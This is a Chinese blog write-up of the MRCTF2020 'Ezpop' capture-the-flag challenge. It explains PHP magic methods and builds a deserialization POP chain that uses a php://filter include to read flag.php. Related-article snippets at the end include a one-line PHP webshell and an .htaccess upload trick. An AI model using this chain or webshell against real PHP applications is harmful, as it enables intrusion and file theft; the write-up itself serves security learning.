[MRCTF2020]Ezpop

最新推荐文章于 2023-11-25 17:08:40 发布
最新推荐文章于 2023-11-25 17:08:40 发布
阅读量294 收藏
点赞数
分类专栏: BUUCTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cyhdl666/article/details/116848658
版权

文章目录

题目源码

  • pop链的构造
  • 题目源码
 <?php
//flag is in flag.php
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}
class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

魔术方法

wakeup

  • __wakeup()是在反序列化操作中起作用的魔法函数,当unserialize的时候,会检查时候存在__wakeup()函数,如果存在的话,会优先调用__wakeup()函数。
  • 举个例子
<?php 
class test
{
    public $a='111';
    function __wakeup(){
        echo '__wakeup';
    }
}
$a = new test();
$b = serialize($a);
$c = unserialize($b);
// 输出结果为__wakeup
?>

tostring

  • 打印一个对象的时被调用。如 echo $obj.
<?php 
class test
{
    public $a='111';
    function __toString()
    {
        echo '我是test的实例对象';
    }
}
$a = new test();
echo $a; //我是test的实例对象
?>

invoke

  • 将对象调用为函数时触发
<?php 
class test
{
    public $a='111';
    function __invoke()
    { 
        echo '对象当函数用';
    }
}
$a = new test();
$a();//输出:对象当函数用
?>

get

  • __get() 用于从不可访问的属性读取数据

构造pop链

  • 看到include函数第一个边想到了利用文件包含去读取文件
  • 这里尝试将var赋予值php://filter/read=convert.base64-encode/resource=flag.php
  • 最后利用test类的__get函数去调用__invoke中的include
  1. 首先当进行反序列的时候,会调用__wakeup()函数
 public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
  1. 如果想继续构造下去 就要在$this->source上搞点事情,show类中有一个__tostring()函数,所以如果$this->source依然为一个show的实例化对象,则会调用到__tostring()函数
    public function __toString(){
        return $this->str->source;
    }
  1. 这里我们再将str赋值为test类的实例化对象,此时$this->str为test类,没有source属性,就会调用到函数__get()
    public function __get($key){
        $function = $this->p;
        return $function();
    }
  1. 这里我们再将test类的实例化对象p属性赋值为modifier类的实例化对象,return $function()就会调用对象函数,进而用到了__invoke函数的文件包含
  • 所以最后的代码为
<?php
class Modifier {
    protected  $var='php://filter/read=convert.base64-encode/resource=flag.php';
}

class Show{
    public $source;
    public $str;
}

class Test{
    public $p;
}

$a = new show();
$a->source = new show();
$a->source->str = new Test();
$a->source->str->p = new Modifier();
echo serialize($a);
?>
  • 运行结果get传参
  • 流程图
a Show类
source Show类
str
souce
str Test类
P Modifer类
【buuctf】MRCTF2020-Ezpop小白详解
m0_73860001的博客
03-15 1192
真的很详细
[MRCTF2020]Ezpop-1|php序列化
「 虚幻私塾」
06-30 472
1、打开题目获取到源代码信息,如下: 2、我们的最终目标是获取flag.php中的flag信息,因此分析源代码信息,查看哪里可以获取到flag.php文件,发现在Modifier类中存在include($value),因此想到可以通过php伪协议来获取flag.php的信息,所以现在我们的目的就成了调用append函数,接着往下观察,发现__invoke函数调用了append函数,因此我们只要执行了__invoke函数一样可以获得flag信息,那该怎么执行__invoke函数呢:因此,此时我们应该使用别的函
phar反序列化+两道CTF例题
unexpectedthing的博客
02-14 7223
Phar反序列化 phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。(漏洞利用点) 什么是phar文件 在软件中,PHAR(PHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如图像,样式表等)捆绑到一个归档文件中来实现应用程序和库的分发 php通过用户定义和内置的“流包装器”实现复杂的文件处理功能。内置包装器可用于文件系统函数,如(fopen(),copy(),file
BUUCTF (11_22-11_26)
XINO
11-29 5800
[SWPUCTF 2018]SimplePHP 一开始我以为是普通的文件上传 在查看文件的页面发现url http://73fc19e0-7526-4a41-a882-0052e60436d1.node4.buuoj.cn:81/file.php?file= 因为源码里有提示 <!--flag is in f1ag.php--> 我们试试直接访问 但发现回显hacker! 看来是行不通的 那我们先看一下file.php源码 <?php header("content-type:tex
web buuctf [MRCTF2020]Ezpop1
weixin_44214568的博客
04-07 610
知识点:1.魔法函数 2.文件包含漏洞 1.开题,php代码审计 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Cr...
1.30 刷题
Lumos427的博客
01-30 759
ctfshow web入门 命令执行 web37 //flag in flag.php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ include($c); echo $flag; } }else{ highlight_file(__FILE__); } 这里用了include文件包含,代码不能直接执行
一道简单的SSRF
m0_56059226的博客
05-15 745
看到了一道简单的ssrf,由于说有非预期但是忘了这个知识点,所以还是记录一下 题目进去后就是一串代码 <?php highlight_file(__FILE__); //find something in flag1.php $d = $_GET['d']; $file = $_GET['ctf']; if (filter_var($d, FILTER_VALIDATE_URL)) { $r = parse_url($d); if (isset($file)) {
[MRCTF2020]Ezpop 1(代码审计)
weixin_45577185的博客
10-13 356
太绕了,wuwuwu~ Welcome to index.php <?php //flag is in flag.php //提示:flag在flag.php文件内,猜测是当前网站根目录下的flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 /
buu-[MRCTF2020]Xor
qaq517384的博客
03-06 356
32位无壳 执行 ida查看字符串
从零开始做题:[MRCTF2020]不眠之夜-wp
最新发布
weixin_44626085的博客
11-25 1146
从观察题目发现有121张图片,其中1张是损坏的,需要先删除查看发现每张图片的像素大小是200x100(长X高)查看相关信息发现此题涉及到gaps和montage的联合使用montage的作用是把乱序图片先按的总大小拼成一张图gaps的作用是将一张图按指定的size切割并尝试将其拼好。
CTF尝试去读取一下Web目录下的flag.php
diven2的博客
05-28 2559
CTF尝试去读取一下Web目录下的flag.php
攻防世界-WEB-10/6练习
SwBack的博客
10-06 1364
同时根据题目信息得到该环境存在如下文件: index.php flag.php english.php chinese.php 有兴趣可以自己搭建看看。打开题目发现php代码,发现cookie处存在文件包含漏洞。构造payload 得到flag,没有什么难度。通过base64 读取flag.php文件。打开题目提示让传参id并尝试绕过waf。
flag就在flag.php,flag就在flag.php
weixin_35355431的博客
03-11 2485
Web1题目地址1.访问题目存在一个登录界面2.注册一个用户登录,然后会跳转到另一个界面,会给出一些提示3.访问flag.php,试试可不可以得到flag提示admin可以得到flag,然后跳转回登录界面,猜测这和Cookie是有关的4.抓包发现在Cookie里有username,而且每一个用户的username是不一样的,后面的值是base64加密之后的在登录成功跳转的那个页面还有一个修改密码的...
[BUUCTF] 集训第二天
Dannie01的博客
09-29 440
补题 [GXYCTF2019]BabyUpload1 正常开端一句话木马 <?php eval($_POST[cmd]);?> php文件不许上传, 尝试上传jpg 换个姿势改一下内容 <script language='php'>eval($_POST[cmd]);</script> 上传成功,记得这个路径 因为是jpg文件,无法解析php,观察是Apache server,上传.htaccess文件来将其他文件解析成PHP文件 .htaccess文件是Apa
[SWPUCTF 2018]SimplePHP
feng的博客
12-24 578
知识点 PHP的phar反序列化的POP链构造。 WP 这是一道不难的phar反序列化,我个人觉得卡着我的点就是最后要读的文件名,我写程f1ag.php读不出来,一看WP是/var/www/html/f1ag.php,才恍然大悟。 首先进入环境,发现有文件读取和文件上传两个功能,而且f12提示了flagf1ag.php里面,因此大概率就是要去读f1ag.php这个文件,但是文件读取过滤了f1ag,不能直接读,但是可以把其他文件的源码都读到,比较有用的三个文件源码如下: <?php //file.
flag就在flag.php
热门推荐
Peithon的博客
05-13 9万+
Web1 题目地址 1.访问题目存在一个登录界面 2.注册一个用户登录,然后会跳转到另一个界面,会给出一些提示 3.访问flag.php,试试可不可以得到flag 提示admin可以得到flag,然后跳转回登录界面,猜测这和Cookie是有关的 4.抓包 发现在Cookie里有username,而且每一个用户的username是不一样的,后面的值是base64加密...
[SWPUCTF 2018]SimplePHP_wp
lzu_lfl的博客
11-11 344
pop链,phar反序列化
flag in flag.php,hgame2019解题记录
weixin_42531128的博客
03-17 1056
“想与你赏流河山川,踏青山风光无限,樵采打渔为生,尽是梦里的人间。”菜鸡来写wp啦…Level - Week 1WEB谁吃了我的flagfirst根据题目描述,vim、未正常关机…估计也就是考察vimbak的知识,意外退出时,并不会覆盖旧的交换文件,而是会重新生成新的交换文件。而原来的文件中并不会有这次的修改,文件内容还是和打开时一样。第一次产生的交换文件名为“.file.txt.swp”;再次意...
ctf中的php序列化与反序列化
qq_45414878的博客
11-08 1634
ctf中的php序列化与反序列化 刚开始学的php序列化与反序列化,有点雨里雾里的,于是做个笔记~~ 首先我们来了解一下概念知道他是怎么样的一个东西: 序列化(串行化):是将变量转换为可保存或传输的字符串的过程; 反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。 然后了解魔术方法: __construct: 在创建对象时候初始化对象,一般用于对变量赋初值。 __destruct: 和构造函数相反,当对象所在函数调用完
buuctf misc [MRCTF2020]ezmisc 1
05-16
这是一个关于MRCTF2020比赛的misc题目,题目名称为ezmisc 1。不知道你需要什么样的帮助,我可以给你一些关于此题的信息。 题目描述: There are some problems to solve! Each problem corresponds to a flag. Please submit the flags to get your points! 解题思路: 这道题目是一个较为简单的misc题目,我们需要在给定的文本中找到flag,每个flag对应一个问题。比如说,第一个flag对应的问题是: What is the capital of China? 在文本中找到答案"Beijing"即可得到对应的flag。 其他的问题和答案大概率也可以在文本中找到,需要稍微仔细一些,比如有一些问题是需要计算的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值